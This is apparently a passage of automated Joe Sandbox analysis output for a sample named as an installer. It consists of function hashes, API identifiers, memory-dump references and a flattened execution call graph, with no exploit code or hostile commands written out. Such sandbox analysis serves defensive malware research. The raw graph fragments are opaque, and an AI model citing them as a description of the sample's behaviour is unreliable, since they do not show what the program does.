                                                          • Instruction Fuzzy Hash: 3D51F4B39002049FDB14DF68E8806EEBBF5EF89314F14846DE8499B351D336E985CB92
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                           • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: <dJ$Q
                                                          • API String ID: 3519838083-2252229148
                                                          • Opcode ID: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                                                          • Instruction ID: 73231e2b51cf09b7f8fe5abb4dbeef4b84412f1dd036f3be192c023053be699e
                                                          • Opcode Fuzzy Hash: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                                                          • Instruction Fuzzy Hash: DC51A475904249EFCF10DF98C8909EDF7B1FF49358F10862EE521ABA50D739A98ACB14
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                           • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: $D^J
                                                          • API String ID: 3519838083-3977321784
                                                          • Opcode ID: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                                                          • Instruction ID: df53d317ed95af33122646a56f570c474991e5519c506a30d43d88a0e74113bc
                                                          • Opcode Fuzzy Hash: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                                                          • Instruction Fuzzy Hash: 38413BE0A0C5906ED722CE29D450BEDBBE19F26248F18817CC49247F85DB6D5A8BC395
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6C0E46D6), ref: 6C0DD01B
                                                          • __dosmaperr.LIBCMT ref: 6C0DD022
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                           • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr
                                                          • String ID: 8Q
                                                          • API String ID: 1659562826-4022487301
                                                          • Opcode ID: ea60a4e5d8e7aa5f2cab4f62e6394a9190369d06afa3a37f28196cb9061383fe
                                                          • Instruction ID: a2795aa49771d67048e7e8a882c8340be3f69c5a4c5b7cbc69aa7345fe5bc995
                                                          • Opcode Fuzzy Hash: ea60a4e5d8e7aa5f2cab4f62e6394a9190369d06afa3a37f28196cb9061383fe
                                                          • Instruction Fuzzy Hash: 5C4197716043A4AFDB119F68C880BED7FE5EF46344F658258F8808B642D371BD06CB92
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                           • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: X&L$p|J
                                                          • API String ID: 3519838083-2944591232
                                                          • Opcode ID: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                                                          • Instruction ID: 3a622096589343cbefa02e21836c75651125a2172601402812059d70f41b5574
                                                          • Opcode Fuzzy Hash: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                                                          • Instruction Fuzzy Hash: 92317D35695125CBD700DF5CDD01BEE77B1EB22F2CF11112AD918A3EE1CB609AC6CA58
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                           • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: 0|J$`)L
                                                          • API String ID: 3519838083-117937767
                                                          • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                                          • Instruction ID: b520ec9eb6e84cac70288c7f75c9874d17536bdf8eef3e302402ddaca56d12d7
                                                          • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                                          • Instruction Fuzzy Hash: 35419231605785EFDF128F60C490BEABBE2FF55208F04442EE46A57750CB766945CB91
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                           • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: __aulldiv
                                                          • String ID: 3333
                                                          • API String ID: 3732870572-2924271548
                                                          • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                                          • Instruction ID: cbfb12a61bd41034fa063a9b15c79311ebe0398471a2f93d286cd8ed52612aec
                                                          • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                                          • Instruction Fuzzy Hash: AA2146B1900744AED7308FA98880B5BBAFDFF55758F10891FA185D7A40DB70E9448BA5
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                           • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: @$LuJ
                                                          • API String ID: 3519838083-205571748
                                                          • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                                          • Instruction ID: 4d6dd58909168e71b4325fda5e4b8ff071135486d88481da5b90a9c81a479523
                                                          • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                                          • Instruction Fuzzy Hash: 9F01A1B2E01249DADB10DF9988906AEF7B4FF65318F40942EE06DE3A40C3345904CB55
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                           • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: @$xMJ
                                                          • API String ID: 3519838083-951924499
                                                          • Opcode ID: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                                                          • Instruction ID: 61f2f69eecc81830fceae254d99b8800821703a4afe46a5d515b7943cf659e3c
                                                          • Opcode Fuzzy Hash: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                                                          • Instruction Fuzzy Hash: 51117C71A00209DBCB00DF99C4A059EB7B4FF59348B50C86EE469E7B01D7389A05CFA6
                                                          APIs
                                                          • _free.LIBCMT ref: 6C0DDD49
                                                          • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6C0DA63A,?,00000004,?,4B42FCB6,?,?,6C0CF78C,4B42FCB6,?), ref: 6C0DDD85
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                           • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: AllocHeap_free
                                                          • String ID: 8Q
                                                          • API String ID: 1080816511-4022487301
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prologctype
                                                          • String ID: |zJ
                                                          • API String ID: 3037903784-3782439380
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prologctype
                                                          • String ID: <oJ
                                                          • API String ID: 3037903784-2791053824
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @ K$DJ$T)K$X/K
                                                          • API String ID: 0-3815299647
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: D)K$H)K$P)K$T)K
                                                          • API String ID: 0-2262112463

                                                          Execution Graph

                                                          Execution Coverage:4%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0.3%
                                                          Total number of Nodes:2000
                                                          Total number of Limit Nodes:31
74562->74348 74563->74349 74564->74356 74565->74354 74566->74362 74567->74371 74568->74407 74569->74407 74570->74416 74571->74403 74572->74409 74573->74415 74574->74420 74575->74430 74576->74434 74577->74436 74578->74443 74579->74438 74580->74383 74581->74385 74583 ae3a3b 74582->74583 74587 ae2722 74582->74587 74622 ae3bd9 free ctype 74583->74622 74585 ae3a6f 74585->74587 74624 ae3b76 malloc _CxxThrowException __EH_prolog ctype 74585->74624 74586 ae3a42 74586->74585 74588 ae3a67 74586->74588 74589 ae3a52 _CxxThrowException 74586->74589 74587->74404 74587->74406 74623 b10551 malloc _CxxThrowException free memcpy ctype 74588->74623 74589->74588 74592->74404 74593->74421 74594->74428 74595->74432 74596->74431 74597->74398 74598->74390 74599->74397 74600->74520 74602 ad2ea0 74601->74602 74603 ad2ba6 2 API calls 74602->74603 74604 ad2eaf 74603->74604 74605 ae2a61 malloc _CxxThrowException free _CxxThrowException memcpy 74604->74605 74605->74527 74606->74533 74607->74533 74608->74533 74609->74533 74610->74538 74611->74531 74612->74544 74613->74544 74615 b10513 74614->74615 74616 b104df 74614->74616 74615->74557 74617 b104e8 _CxxThrowException 74616->74617 74618 b104fd 74616->74618 74617->74618 74621 b10551 malloc _CxxThrowException free memcpy ctype 74618->74621 74620->74557 74621->74615 74622->74586 74623->74585 74624->74585 74626 af7f14 74625->74626 74628 af7ef7 74625->74628 74626->74458 74627 af7193 free 74627->74628 74628->74626 74628->74627 74666 ad1e40 free 74628->74666 74631 ad2e04 2 API calls 74630->74631 74632 af7103 74631->74632 74632->74458 74634 af7a4a __EH_prolog 74633->74634 74667 ad361b 6 API calls 2 library calls 74634->74667 74636 af7a78 74668 ad361b 6 API calls 2 library calls 74636->74668 74638 af7b20 74670 b02db9 free ctype 74638->74670 74640 ad2e04 malloc _CxxThrowException 74642 af7a83 74640->74642 74641 af7b2b 74671 b02db9 free ctype 74641->74671 74642->74638 74642->74640 74645 ad2fec 3 API calls 74642->74645 74646 ad2fec 3 API calls 74642->74646 
74647 b104d2 5 API calls 74642->74647 74650 ad1e40 free ctype 74642->74650 74669 af7955 malloc _CxxThrowException __EH_prolog ctype 74642->74669 74644 af7b37 74644->74458 74645->74642 74648 af7aca wcscmp 74646->74648 74647->74642 74648->74642 74650->74642 74651->74458 74653 b104d2 5 API calls 74652->74653 74654 ae12ad 74653->74654 74655 ad1e0c ctype 2 API calls 74654->74655 74656 ae12b4 74655->74656 74656->74458 74657->74458 74659 af719d __EH_prolog 74658->74659 74672 b02db9 free ctype 74659->74672 74661 af71b3 74673 af71d5 free __EH_prolog ctype 74661->74673 74663 af71bf 74674 ad1e40 free 74663->74674 74665 af71c7 74665->74458 74666->74628 74667->74636 74668->74642 74669->74642 74670->74641 74671->74644 74672->74661 74673->74663 74674->74665 74676 ad2e57 74675->74676 74677 ad2ba6 2 API calls 74676->74677 74678 ad1fda 74677->74678 74679 ad2010 74678->74679 74680 ad2033 10 API calls 74679->74680 74681 ad2022 fputs 74680->74681 74681->74470 74682->74472 74683->74474 74686 ad7b20 74689 ad7ab2 74686->74689 74690 ad7ac5 74689->74690 74697 ad759a 74690->74697 74693 ad7b03 74711 ad7919 74693->74711 74694 ad7aeb SetFileTime 74694->74693 74698 ad75a4 __EH_prolog 74697->74698 74727 ad764c 74698->74727 74700 ad7632 74700->74693 74700->74694 74701 ad75af 74701->74700 74702 ad75e9 74701->74702 74703 ad75d4 CreateFileW 74701->74703 74702->74700 74704 ad2e04 2 API calls 74702->74704 74703->74702 74705 ad75fb 74704->74705 74730 ad8b4a 74705->74730 74707 ad7611 74708 ad762a 74707->74708 74709 ad7615 CreateFileW 74707->74709 74735 ad1e40 free 74708->74735 74709->74708 74712 ad7aac 74711->74712 74713 ad793c 74711->74713 74713->74712 74714 ad7945 DeviceIoControl 74713->74714 74715 ad7969 74714->74715 74716 ad79e6 74714->74716 74715->74716 74722 ad79a7 74715->74722 74717 ad79ef DeviceIoControl 74716->74717 74720 ad7a14 74716->74720 74718 ad7a22 DeviceIoControl 74717->74718 74717->74720 74719 ad7a44 DeviceIoControl 74718->74719 74718->74720 74719->74720 74720->74712 74854 ad780d 8 API 
calls ctype 74720->74854 74853 ad9252 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 74722->74853 74723 ad7aa5 74725 ad77de 5 API calls 74723->74725 74725->74712 74726 ad79d0 74726->74716 74728 ad7661 74727->74728 74729 ad7656 CloseHandle 74727->74729 74728->74701 74729->74728 74736 ad8b80 74730->74736 74732 ad8b6e 74732->74707 74734 ad2f88 3 API calls 74734->74732 74735->74700 74737 ad8b8a __EH_prolog 74736->74737 74738 ad8c7b 74737->74738 74744 ad8be1 74737->74744 74783 ad8b55 74737->74783 74739 ad8d23 74738->74739 74741 ad8c8f 74738->74741 74740 ad8e8a 74739->74740 74743 ad8d3b 74739->74743 74742 ad2e47 2 API calls 74740->74742 74741->74743 74749 ad8c9e 74741->74749 74745 ad8e96 74742->74745 74746 ad2e04 2 API calls 74743->74746 74747 ad2e47 2 API calls 74744->74747 74744->74783 74753 ad2e47 2 API calls 74745->74753 74748 ad8d43 74746->74748 74750 ad8c05 74747->74750 74833 ad6332 6 API calls 2 library calls 74748->74833 74752 ad2e47 2 API calls 74749->74752 74756 ad8c24 74750->74756 74757 ad8c17 74750->74757 74760 ad8ca7 74752->74760 74755 ad8eb8 74753->74755 74754 ad8d52 74817 ad8d56 74754->74817 74834 ad859e malloc _CxxThrowException free _CxxThrowException 74754->74834 74845 ad8f57 memmove 74755->74845 74763 ad2e47 2 API calls 74756->74763 74823 ad1e40 free 74757->74823 74765 ad2e47 2 API calls 74760->74765 74762 ad8ec4 74766 ad8ede 74762->74766 74767 ad8ec8 74762->74767 74768 ad8c35 74763->74768 74770 ad8cd0 74765->74770 74848 ad3221 malloc _CxxThrowException free _CxxThrowException 74766->74848 74846 ad1e40 free 74767->74846 74824 ad8f57 memmove 74768->74824 74828 ad8f57 memmove 74770->74828 74773 ad8eeb 74849 ad31e5 malloc _CxxThrowException free _CxxThrowException 74773->74849 74775 ad8ed0 74847 ad1e40 free 74775->74847 74776 ad8c41 74779 ad8c6b 74776->74779 74825 ad31e5 malloc _CxxThrowException free _CxxThrowException 74776->74825 74777 ad8cdc 74782 ad8d13 74777->74782 74829 ad3221 malloc _CxxThrowException free _CxxThrowException 74777->74829 74827 
ad1e40 free 74779->74827 74832 ad1e40 free 74782->74832 74783->74732 74783->74734 74786 ad8f06 74850 ad31e5 malloc _CxxThrowException free _CxxThrowException 74786->74850 74787 ad8c73 74852 ad1e40 free 74787->74852 74789 ad2e04 2 API calls 74793 ad8ddf 74789->74793 74790 ad8c60 74826 ad31e5 malloc _CxxThrowException free _CxxThrowException 74790->74826 74792 ad8ced 74830 ad31e5 malloc _CxxThrowException free _CxxThrowException 74792->74830 74798 ad8e0e 74793->74798 74801 ad8df1 74793->74801 74795 ad8f11 74851 ad1e40 free 74795->74851 74797 ad8d65 74797->74789 74797->74817 74802 ad2f88 3 API calls 74798->74802 74835 ad3199 malloc _CxxThrowException free _CxxThrowException 74801->74835 74805 ad8e0c 74802->74805 74803 ad8d08 74831 ad31e5 malloc _CxxThrowException free _CxxThrowException 74803->74831 74837 ad8f57 memmove 74805->74837 74807 ad8e03 74836 ad3199 malloc _CxxThrowException free _CxxThrowException 74807->74836 74810 ad8e22 74811 ad8e26 74810->74811 74812 ad8e3b 74810->74812 74838 ad3221 malloc _CxxThrowException free _CxxThrowException 74810->74838 74843 ad1e40 free 74811->74843 74839 ad8f34 malloc _CxxThrowException 74812->74839 74816 ad8e49 74840 ad31e5 malloc _CxxThrowException free _CxxThrowException 74816->74840 74844 ad1e40 free 74817->74844 74819 ad8e56 74841 ad1e40 free 74819->74841 74821 ad8e62 74842 ad31e5 malloc _CxxThrowException free _CxxThrowException 74821->74842 74823->74783 74824->74776 74825->74790 74826->74779 74827->74787 74828->74777 74829->74792 74830->74803 74831->74782 74832->74787 74833->74754 74834->74797 74835->74807 74836->74805 74837->74810 74838->74812 74839->74816 74840->74819 74841->74821 74842->74811 74843->74817 74844->74783 74845->74762 74846->74775 74847->74783 74848->74773 74849->74786 74850->74795 74851->74787 74852->74783 74853->74726 74854->74723 74855 adc3bd 74856 adc3ca 74855->74856 74858 adc3db 74855->74858 74856->74858 74859 ad1e40 free 74856->74859 74859->74858 74860 afcefb 74861 afd0cc 74860->74861 74862 afcf03 
74860->74862 74862->74861 74907 afcae9 VariantClear 74862->74907 74864 afcf59 74864->74861 74908 afcae9 VariantClear 74864->74908 74866 afcf71 74866->74861 74909 afcae9 VariantClear 74866->74909 74868 afcf87 74868->74861 74910 afcae9 VariantClear 74868->74910 74870 afcf9d 74870->74861 74911 afcae9 VariantClear 74870->74911 74872 afcfb3 74872->74861 74912 afcae9 VariantClear 74872->74912 74874 afcfc9 74874->74861 74913 ad4504 malloc _CxxThrowException 74874->74913 74876 afcfdc 74877 ad2e04 2 API calls 74876->74877 74879 afcfe7 74877->74879 74878 afd009 74881 afd07b 74878->74881 74883 afd080 74878->74883 74884 afd030 74878->74884 74879->74878 74880 ad2f88 3 API calls 74879->74880 74880->74878 74921 ad1e40 free 74881->74921 74918 af7a0c CharUpperW 74883->74918 74887 ad2e04 2 API calls 74884->74887 74885 afd0c4 74922 ad1e40 free 74885->74922 74890 afd038 74887->74890 74889 afd08b 74919 aefdbc 4 API calls 2 library calls 74889->74919 74891 ad2e04 2 API calls 74890->74891 74893 afd046 74891->74893 74914 aefdbc 4 API calls 2 library calls 74893->74914 74894 afd0a7 74896 ad2fec 3 API calls 74894->74896 74898 afd0b3 74896->74898 74897 afd057 74899 ad2fec 3 API calls 74897->74899 74920 ad1e40 free 74898->74920 74901 afd063 74899->74901 74915 ad1e40 free 74901->74915 74903 afd06b 74916 ad1e40 free 74903->74916 74905 afd073 74917 ad1e40 free 74905->74917 74907->74864 74908->74866 74909->74868 74910->74870 74911->74872 74912->74874 74913->74876 74914->74897 74915->74903 74916->74905 74917->74881 74918->74889 74919->74894 74920->74881 74921->74885 74922->74861 74923 b0c2e6 74924 b0c52f 74923->74924 74927 b0544f SetConsoleCtrlHandler 74924->74927 74926 b0c53b 74927->74926 74928 b56ba3 VirtualFree 74929 b67da0 WaitForSingleObject 74930 b67dc1 74929->74930 74931 b67dbb GetLastError 74929->74931 74932 b67dce CloseHandle 74930->74932 74933 b67ddf 74930->74933 74931->74930 74932->74933 74934 b67dd9 GetLastError 74932->74934 74934->74933 74935 b1bf67 74936 b1bf74 74935->74936 74940 
b1bf85 74935->74940 74936->74940 74941 b1bf8c 74936->74941 74942 b1bf96 __EH_prolog 74941->74942 74958 b1d144 74942->74958 74946 b1bfd0 74965 ad1e40 free 74946->74965 74948 b1bfdb 74966 ad1e40 free 74948->74966 74950 b1bfe6 74967 b1c072 free ctype 74950->74967 74952 b1bff4 74968 aeaafa free VariantClear ctype 74952->74968 74954 b1c023 74969 af73d2 free VariantClear __EH_prolog ctype 74954->74969 74956 b1bf7f 74957 ad1e40 free 74956->74957 74957->74940 74960 b1d14e __EH_prolog 74958->74960 74970 b1d1b7 74960->74970 74963 b1bfc5 74964 ad1e40 free 74963->74964 74964->74946 74965->74948 74966->74950 74967->74952 74968->74954 74969->74956 74978 b1d23c 74970->74978 74972 b1d1ed 74985 ad1e40 free 74972->74985 74974 b1d209 74986 ad1e40 free 74974->74986 74976 b1d180 74977 b18e04 memset 74976->74977 74977->74963 74987 b1d2b8 74978->74987 74981 b1d25e 75004 ad1e40 free 74981->75004 74984 b1d275 74984->74972 74985->74974 74986->74976 75006 ad1e40 free 74987->75006 74989 b1d2c8 75007 ad1e40 free 74989->75007 74991 b1d2dc 75008 ad1e40 free 74991->75008 74993 b1d2e7 75009 ad1e40 free 74993->75009 74995 b1d2f2 75010 ad1e40 free 74995->75010 74997 b1d2fd 75011 ad1e40 free 74997->75011 74999 b1d308 75012 ad1e40 free 74999->75012 75001 b1d313 75002 b1d246 75001->75002 75013 ad1e40 free 75001->75013 75002->74981 75005 ad1e40 free 75002->75005 75004->74984 75005->74981 75006->74989 75007->74991 75008->74993 75009->74995 75010->74997 75011->74999 75012->75001 75013->75002 75014 b0a42c 75015 b0a435 fputs 75014->75015 75016 b0a449 75014->75016 75172 ad1fa0 fputc 75015->75172 75173 b0545d 75016->75173 75020 ad2e04 2 API calls 75021 b0a4a1 75020->75021 75177 af1858 75021->75177 75023 b0a4c9 75239 ad1e40 free 75023->75239 75025 b0a4d8 75026 b0a4ee 75025->75026 75027 b0c7d7 ctype 6 API calls 75025->75027 75028 b0a50e 75026->75028 75240 b057fb 75026->75240 75027->75026 75250 b0c73e 75028->75250 75033 b0ac17 75406 b02db9 free ctype 75033->75406 75034 ad1e0c ctype 2 API calls 75036 b0a53a 
75034->75036 75040 b0a54d 75036->75040 75376 b0b0fa malloc _CxxThrowException __EH_prolog 75036->75376 75037 b0ac3a 75408 b0b96d _CxxThrowException 75037->75408 75038 b0ac23 75038->75037 75041 b0ac35 75038->75041 75043 ad2fec 3 API calls 75040->75043 75407 b0b988 33 API calls __aulldiv 75041->75407 75050 b0a586 75043->75050 75045 b0ac42 75409 ad1e40 free 75045->75409 75047 b0ac4d 75048 af3247 free 75047->75048 75049 b0ac5d 75048->75049 75410 ad1e40 free 75049->75410 75268 b0ad06 75050->75268 75054 b0ac7d 75411 ad11c2 free __EH_prolog ctype 75054->75411 75058 b0ac89 75059 ae3a29 5 API calls 75061 b0a62e 75059->75061 75149 b0aae5 75405 b02db9 free ctype 75149->75405 75172->75016 75174 b05473 75173->75174 75175 b05466 75173->75175 75174->75020 75414 ad275e malloc _CxxThrowException free ctype 75175->75414 75178 af1862 __EH_prolog 75177->75178 75415 af021a 75178->75415 75183 af18b9 75429 af1aa5 free __EH_prolog ctype 75183->75429 75185 af1935 75434 af1aa5 free __EH_prolog ctype 75185->75434 75186 af18c7 75430 b02db9 free ctype 75186->75430 75190 af1944 75211 af1966 75190->75211 75435 af1d73 5 API calls __EH_prolog 75190->75435 75191 af18d3 75191->75023 75192 b104d2 5 API calls 75198 af18db 75192->75198 75194 af1958 _CxxThrowException 75194->75211 75195 af19be 75442 aff1f1 malloc _CxxThrowException free _CxxThrowException 75195->75442 75197 ad2e04 2 API calls 75197->75211 75198->75185 75198->75192 75431 af0144 malloc _CxxThrowException free _CxxThrowException 75198->75431 75432 ad1524 malloc _CxxThrowException __EH_prolog ctype 75198->75432 75433 ad1e40 free 75198->75433 75200 af19d6 75202 af7ebb free 75200->75202 75204 af19e1 75202->75204 75205 ae12d4 4 API calls 75204->75205 75207 af19ea 75205->75207 75206 b104d2 5 API calls 75206->75211 75208 af7ebb free 75207->75208 75210 af19f7 75208->75210 75212 ae12d4 4 API calls 75210->75212 75211->75195 75211->75197 75211->75206 75436 ad631f 75211->75436 75440 ad1524 malloc _CxxThrowException __EH_prolog ctype 75211->75440 
